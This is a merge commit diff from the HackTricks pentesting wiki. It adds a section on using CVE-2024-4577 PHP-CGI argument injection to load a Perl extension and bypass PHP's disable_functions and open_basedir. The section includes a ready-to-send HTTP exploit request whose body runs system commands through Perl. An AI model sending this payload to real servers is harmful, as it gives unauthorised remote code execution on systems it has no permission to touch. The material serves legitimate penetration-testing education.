Merge pull request #1879 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_php-tricks-esp_php-useful-functions-disable_functions-open_basedir-bypass_disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit_20260210_132715

Research Update Enhanced src/network-services-pentesting/pen...

Author: carlospolop

src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md

@@ -114,11 +114,31 @@ $perl = new perl();
 $perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');
 ```
 
+## 2024+ Abuse: Loading `perl.so` via PHP-CGI Argument Injection (CVE-2024-4577)
+
+On Windows installs that still expose **PHP-CGI**, the 2024 argument-injection regression (CVE-2024-4577) lets you pass arbitrary `-d` options to the interpreter. That means you can load the Perl extension even when `dl()` is disabled and `php.ini` is read-only:
+
+* Build or upload a compatible `perl.dll`/`perl.so` to a web-writable path (e.g., `C:\xampp\htdocs\temp\perl.dll`).
+* Send a single HTTP request that injects `-d extension=C:\\xampp\\htdocs\\temp\\perl.dll` and, in the same request body, a Perl-backed payload:
+
+```http
+POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
+Host: victim
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 120
+
+<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>
+```
+
+Because the PHP worker now embeds Perl before reading the body, all classic `disable_functions`/`open_basedir` controls are bypassed. This works on vulnerable Windows/CGI stacks until patched (PHP 8.1.29/8.2.20/8.3.8 and later close the regression). If `open_basedir` blocks the DLL path, drop the file inside the allowed base dir first or leverage an existing world-readable DLL path shipped by XAMPP.
+
 ## References
 
 - [CVE-2007-4596 summary and timeline](https://www.cvedetails.com/cve/CVE-2007-4596/)
 - [PECL perl extension package information](https://pecl.php.net/package/perl)
 - [PHP Manual: building PECL extensions with phpize](https://www.php.net/manual/en/install.pecl.phpize.php)
 - [PECL homepage announcing PIE replacement](https://pecl.php.net/)
+- [CVE-2024-4577 PHP-CGI argument injection PoC](https://github.com/AlperenY-cs/CVE-2024-4577)
+- [Plesk advisory summarizing CVE-2024-4577 impact and patched versions](https://support.plesk.com/hc/en-us/articles/24020385443351-Security-Alert-CVE-2024-4577-PHP-CGI-Argument-Injection-Vulnerability)
 
 {{#include ../../../../banners/hacktricks-training.md}}